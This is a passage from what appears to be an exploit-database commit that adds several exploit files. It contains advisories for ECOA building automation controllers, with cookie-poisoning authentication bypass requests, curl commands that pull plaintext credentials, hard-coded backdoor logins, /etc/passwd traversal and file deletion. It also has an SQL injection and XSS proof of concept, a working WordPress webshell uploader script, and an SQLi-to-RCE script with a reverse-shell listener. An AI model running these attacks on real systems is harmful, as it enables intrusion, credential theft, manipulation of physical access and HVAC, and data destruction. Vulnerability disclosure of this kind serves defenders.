RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller suffers from an authentication bypass vulnerability. An unauthenticated attacker
through cookie poisoning can bypass authentication and disclose sensitive information and circumvent
physical access controls in smart homes and buildings and manipulate HVAC.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5672
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5672.php
25.06.2021
--
Authentication Bypass
---------------------
- Authentication bypass happens by modifying the Cookie values.
- Setting the UCLS Cookie larger or equal to 19 bypasses security controls.
Request:
GET /menu.jsp?fname=../sysuse/system01.frm&time=5 HTTP/1.1
Host: 192.168.1.3:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: JSESSIONID=t00tw00t; UCLS=251; UID=zero; PWD=science; ROOT=FOUND; AlmCt=0
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

131
exploits/hardware/webapps/50280.txt Normal file
View file

@ -0,0 +1,131 @@
# Exploit Title: ECOA Building Automation System - Configuration Download Information Disclosure
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Configuration Download Information Disclosure
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller is vulnerable to configuration disclosure when direct object reference is made
to the syspara.dat or images.dat files using an HTTP GET request. This will enable the attacker to
disclose sensitive information and help her in authentication bypass, privilege escalation and full
system access.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5673
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5673.php
25.06.2021
--
Configuration / Backup Download / Privilege Escalation / Password Disclosure
----------------------------------------------------------------------------
- Unauthenticated config download reveals plain-text passwords
$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/syspara.dat
$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/images.dat
$ strings *
...
...
/opt/webpage/pwsd.bin
/user
user
embed
power
1234
1234
/opt/webpage/system.bin
Oboothr=24
bootmin=00
OutIDWork=Y
language=big5
seclanguage=Y
ValSet=Y
allpollTm=500
httpusr=embed
httppwd=power
...
...

114
exploits/hardware/webapps/50281.txt Normal file
View file

@ -0,0 +1,114 @@
# Exploit Title: ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Hidden Backdoor Accounts and backdoor() Function
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller has hidden backdoors in several binaries that serve the web application. Any
unauthenticated attacker can download all the resources and binaries/services that serve the controller
and search for the 'backdoor()' function in httpser.elf as well as discover hidden credentials for
backdoor access with full functionality of the Smart Home, Access Control and Building Automation
System solutions.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5674
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5674.php
25.06.2021
--
Backdoor Accounts / Authentication Bypass
-----------------------------------------
- Example of backdoors revealed in httpser.elf binary:
...
...
VAR2 = strstr(ARG1,"username=humexembed&password=simonamandoor");
if (VAR2 == (char *)0x0) {
VAR2 = strstr(ARG1,"username=amandoor&password=amandoor");
...
...

110
exploits/hardware/webapps/50284.txt Normal file
View file

@ -0,0 +1,110 @@
# Exploit Title: ECOA Building Automation System - Remote Privilege Escalation
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Remote Privilege Escalation
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller is vulnerable to weak access control mechanism allowing any user to escalate
privileges by disclosing credentials of administrative accounts in plain-text.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5677
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5677.php
25.06.2021
--
Privilege Escalation
--------------------
- Any user can navigate to the User Edit page (useredt.jsp) and see the password of other users in clear-text.
Request:
$ curl -s http://192.168.1.3:8080//useredt.jsp -H "Cookie: JSESSIONID=t00tw00t; UCLS=19; UID=user; PWD=user; ROOT=FOUND; AlmCt=0" |findstr embed
<tr autoid='1' tgs='' ><td><input type='checkbox' onclick='onchk(this);' ></td><td>embed</td><td>power</td><td>19</td><td>&nbsp;</td><tr autoid='1' tgs='' ><td><input type='checkbox' onclick='onchk(this);' ></td><td>root</td><td>embed</td><td>19</td><td>&nbsp;</td><input type='hidden' name='delrow' value='' >

133
exploits/hardware/webapps/50285.txt Normal file
View file

@ -0,0 +1,133 @@
# Exploit Title: ECOA Building Automation System - Local File Disclosure
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Local File Disclosure Vulnerability
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST
parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and
disclose sensitive and system information.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5679
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
25.06.2021
--
Arbitrary File Disclosure
-------------------------
- Attackers can disclose any file by abusing the 'fname' POST parameter in viewlog.jsp and reveal sensitive information.
Request:
POST /viewlog.jsp HTTP/1.1
Host: 192.168.1.3:8080
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
...
...

110
exploits/hardware/webapps/50286.txt Normal file
View file

@ -0,0 +1,110 @@
# Exploit Title: ECOA Building Automation System - Arbitrary File Deletion
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Arbitrary File Deletion
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller suffers from an arbitrary file deletion vulnerability. Using the 'cfile' GET
parameter in fmanerdel, attackers can delete arbitrary files on the affected device and cause
denial of service scenario.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5680
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5680.php
25.06.2021
--
Arbitrary File Deletion
-----------------------
- Attacker can delete any file by abusing 'cfile' GET parameter in fmanerdel applet and using traversal sequence.
Request:
GET /fmanerdel?cfile=../secretFile.txt HTTP/1.1

30
exploits/php/webapps/50274.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities
# Date: 2021-09-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql
# Version: 1.0
# Tested on: Windows 10 - XAMPP Server
# Vulnerable page :
http://localhost/msms/admin/edit-customer-detailed.php?editid=
# Proof Of Concept :
# 1 . Download And install [ Men Salon Management System ]
# 2 . Go to /msms/admin/index.php and Enter Username & Password
# 3 . Navigate to >> Customer List
# 4 . In the action column, click Edit
# 5 . Enter the payload into the Url and Fields
# [ Sql Injection ] :
Vulnerable paramater :
The editid paramater is Vulnerable to sqli
GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+
# [ Stored Cross-Site Scripting ] :
Vulnerable Fields : Name & Email
Payload Used: "><script>alert(document.cookie)</script>

75
exploits/php/webapps/50287.py Executable file
View file

@ -0,0 +1,75 @@
# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("Download From Files <= 1.48 - Arbitrary File Upload")
print("Author -> spacehen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url] [php file]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("Sikeres" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'download_from_files_617_fileupload'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
files = {'files[]' : open(file_path)}
data = {
"allowExt" : "php4,phtml",
"filesName" : "files",
"maxSize" : "1000",
"uploadDir" : "."
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
if(base[-1] != '/'):
base += '/'
print(base + "wp-admin/" + file_name);
else:
print("Shell Upload Failed")
sys.exit(1)
main();

77
exploits/php/webapps/50288.py Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE
# Date: 2021-08-13
# Exploit Author: mari0x00
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: 1.0
# Tested on: Windows 10 + XAMPP
#!/usr/bin/python3
import requests, socket, threading
import base64, time, sys
print(('''###########################################################''',"red"))
print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red"))
print(('''###########################################################''',"red"))
print("")
URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/'
path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php'
path = path.replace("\\", "\\\\")
rhost = input("Provide attacker IP: ") or "127.0.0.1"
rport = input("Provide attacker listening port: ") or "1337"
# sending webshell
payload = {"username": "admin' union select '<?php system(base64_decode($_GET[\"cmd\"]));?>' into outfile '" + path + "' -- 'a", "password": "test", "login": ''}
requests.post(URL, data=payload)
def shell(rhost, rport):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((rhost, int(rport)))
except socket.error as msg:
print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1])
sys.exit()
s.settimeout(5)
s.listen(5)
print('[+] Waiting for connection..')
conn = False
command=''
while conn == False:
try:
conn, addr = s.accept()
print("Got a connection from " + addr[0] + ":" + str(addr[1]))
conn.send('\n'.encode())
time.sleep(1)
print(conn.recv(0x10000).decode())
while(command != 'exit'):
command=input('')
conn.send((command + '\n').encode())
time.sleep(.3)
res = conn.recv(0x10000)
print(res.decode())
s.close()
sys.exit("[!] Program exited")
except socket.timeout:
pass
def start_shell(rhost, rport):
